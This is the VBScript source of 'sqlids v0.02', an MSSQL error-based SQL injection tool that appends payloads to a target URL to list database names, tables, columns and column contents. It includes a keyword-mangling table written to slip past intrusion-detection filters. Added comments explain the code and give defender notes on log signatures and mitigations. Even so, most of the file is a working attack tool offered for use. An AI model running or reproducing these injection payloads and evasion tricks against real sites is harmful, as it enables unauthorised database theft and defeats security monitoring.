作者:lcx

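' Entry guard: the tool is console-only, so it refuses to run under the
' windowed host (wscript.exe) and prints usage when no argument is given.
set arg=wscript.arguments
' LCase() yields "wscript.exe", so the literal it is compared with must be
' lower-case too. The original compared against "Wscript.exe", which can
' never match after LCase() because "=" on strings is a binary (case-
' sensitive) comparison in VBScript — the guard silently never fired.
If (LCase(Right(Wscript.fullname,11))="wscript.exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If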

' Prints the banner and the four supported sub-commands to the console.
' Every line goes through wsh.echo (one line per call); the first and last
' lines are a 79-character row of asterisks, the last one followed by an
' extra CRLF.
Sub usage()
    Dim banner, text, n
    banner = String(79, "*")
    text = Array( _
        banner, _
        "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型", _
        "sqlids v0.02 by lcx", _
        "Usage:", _
        "cscript " & wscript.scriptname & " url dbname ||———–>得到全部库名", _
        "cscript " & wscript.scriptname & " url table 库名||——–>得到全部表名", _
        "cscript " & wscript.scriptname & " url filed 表名||———->得到全部字段", _
        "cscript " & wscript.scriptname & " url result 字段名 表名||———->得到字段内容", _
        banner & vbcrlf)
    For n = 0 To UBound(text)
        wsh.echo text(n)
    Next
End Sub
' Fetches Path with GetBody() and returns the response decoded as GB2312
' text via BytesToBstr(). Path: the URL handed to GetBody().
' If GetBody() failed (it swallows errors and returns Empty), the decode
' step is where the failure surfaces.
Function getHTTPPage(Path)
    getHTTPPage = BytesToBstr(GetBody(Path), "GB2312")
End Function
' Issues a synchronous POST to url through Microsoft.XMLHTTP and returns
' the raw response bytes (ResponseBody). No request body is sent; the
' author's note says this could be changed to a cookie or GET submission.
' On Error Resume Next is deliberate in the original: any COM or network
' failure is swallowed and the function then returns Empty, which callers
' do not check.
' Request shape visible to a defender reading web logs: a POST with an
' empty body, the fixed MSIE 7.0 User-Agent below, "Accept-Encoding:
' gzip, deflate" and "Cache-Control: no-cache".
Function GetBody(url)
    On Error Resume Next
    Dim http
    Set http = CreateObject("Microsoft.XMLHTTP")
    http.Open "post", url, False, "", ""
    http.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    http.setRequestHeader "Accept-Encoding", "gzip, deflate"
    http.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
    http.setRequestHeader "Connection", "Keep-Alive"
    http.setRequestHeader "Cache-Control", "no-cache"
    http.Send
    GetBody = http.ResponseBody
    http.abort
    Set http = Nothing
End Function
' Converts a byte array (e.g. XMLHTTP.ResponseBody) into a string: the
' bytes are written into an ADODB.Stream opened in binary mode, the stream
' is rewound and switched to text mode, and the text is read back using
' charset Cset.
' Body: the bytes to decode. Cset: charset name handed to the stream.
Function BytesToBstr(Body, Cset)
    Dim stm
    Set stm = CreateObject("adodb.stream")
    With stm
        .Type = 1          ' adTypeBinary
        .Mode = 3          ' adModeReadWrite
        .Open
        .Write Body
        .Position = 0
        .Type = 2          ' adTypeText
        .Charset = Cset
        BytesToBstr = .ReadText
        .Close
    End With
    Set stm = Nothing
End Function
' Rewrites SQL keywords in Value according to the "keyword->replacement"
' table below (the author's note: to get past IDS filtering).
' Table is split on "|[k]|" into one entry per keyword, each entry split on
' "->" into (keyword, replacement); entries with anything other than one
' "->" are skipped. Replace() is called with its default binary comparison,
' so only lower-case keywords are substituted, and entries are applied in
' table order, so an earlier substitution can change what a later entry
' would match.
' Detection note: the substituted forms ("se%lect", "fro%m", "a%nd", ...)
' are distinctive strings in their own right and can be matched directly,
' and the original keyword is restored by decoding/normalising the input
' before signature matching.
Function ReplaceKeyWord(Value)' author's note: to get past IDS filtering
Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown->shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|[k]|fetch->fe%tch|[k]|next->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|exec->e%xec|[k]|=!->=%!|[k]|—>-%-|[k]|xp_->x%p_|[k]|sp_->s%p_|[k]|and->a%nd"
Dim i, Relpacement, Temp
Relpacement = Split(Table, "|[k]|")
ReplaceKeyWord = Value
For i = 0 to UBound(Relpacement)
Temp = Split(Relpacement(i), "->")
' Only well-formed "a->b" entries are applied; Replace is case-sensitive here.
If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1))
Next
End Function
' Extracts the value quoted in an MSSQL conversion-error message from a
' page: takes the text after the first "nvarchar", then the text between
' the first two single quotes of that remainder. Without "nvarchar" the
' input is returned unchanged. (The author's note: a regex would be nicer.)
' The parameter is assigned to, and VBScript passes ByRef by default, so a
' caller's variable is overwritten with the extracted value. If the
' remainder after "nvarchar" holds no single quote, the second index
' raises a subscript error (unchanged from the original).
Function result(sHTMLTEMP)
    Dim pieces
    pieces = Split(sHTMLTEMP, "nvarchar")
    If UBound(pieces) > 0 Then
        sHTMLTEMP = pieces(1)
        pieces = Split(sHTMLTEMP, "'")
        sHTMLTEMP = pieces(1)
    End If
    result = sHTMLTEMP
End Function

' Hex conversion helper for SQL (author's note): returns "0x" followed by,
' for each character of strHex, Hex(Asc(char)) and a trailing "00" byte,
' i.e. one 16-bit little-endian unit per character. Hex() is not
' zero-padded, so a code below &H10 contributes a single digit, and a
' character whose Asc() value exceeds one byte yields more than two digits;
' only single-byte characters produce a well-formed literal. Empty input
' yields the bare prefix "0x".
Function Str2Hex(strHex)
    Dim pos, units
    units = ""
    For pos = 1 To Len(strHex)
        units = units & Hex(Asc(Mid(strHex, pos, 1))) & "00"
    Next
    Str2Hex = "0x" & units
End Function

'—— The statements below build the probe queries; the author's note: none of them needs a quote character.
' Positional arguments: arg(0) = target URL, arg(1) = sub-command,
' arg(2)/arg(3) = the names a sub-command needs (see usage()). arg(1),
' arg(2) and arg(3) are read without checking arg.count, so a missing
' argument fails with a subscript error instead of printing usage.
url=arg(0)
' Redundant: arg was already set and the empty case already handled at the
' top of the script (and arg(0) was read on the line above).
set arg=wscript.arguments
if arg.count=0 then wscript.quit
injection =arg(1)

' Shape shared by every branch: the payload is appended to the URL after a
' bare space (not URL-encoded), double quotes are stripped from the
' response, and the response is searched for the word "nvarchar" — the
' tool depends on the server echoing MSSQL's type-conversion error text
' back to the client. Server-side mitigations: parameterized queries so
' appended text is never executed, and generic error pages so database
' error messages never reach the response.
select case injection
case "dbname"
' First request: the current database; the loop then walks db_name(i).
wscript.echo result(Replace(getHTTPPage(url&" "&ReplaceKeyWord("and db_name(0)>0–")),Chr(34),""))&"(当前库)"
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("and db_name("&i&")>0–")),Chr(34),"")
' k = 0 means no error text came back; the enumeration is treated as exhausted.
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
' result() assigns to its parameter and VBScript passes ByRef by default,
' so Body holds the extracted value after this call; k was computed
' above, so the loop condition is unaffected.
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0

case "table"
' Walks the objects of arg(2).dbo.sysobjects one name per request,
' excluding the first i names each time.
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects where xtype=0x7500))–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0

case "filed"
' Str2Hex() turns the table name into a hex literal, which is why arg(2)
' needs no quotes; one column index (i) is asked for per request.
colname=Str2Hex(arg(2))
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("and 0<>COL_NAME(OBJECT_ID("&colname&"),"&i&")–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "result"
' Unlike the other branches this payload is partly pre-obfuscated
' ("a%nd", "se%lect") before ReplaceKeyWord() runs; the remaining plain
' keywords are still rewritten by the table.
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("a%nd 0<>(se%lect top 1 "&arg(2)&" from "&arg(3)&" where "&arg(2)&" not in (select top "&i&" "&arg(2)&" from "&arg(3)&"))–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
Case else
' Unknown sub-command: warn about the arguments and print usage.
wscript.echo "注意参数"
usage()
end select


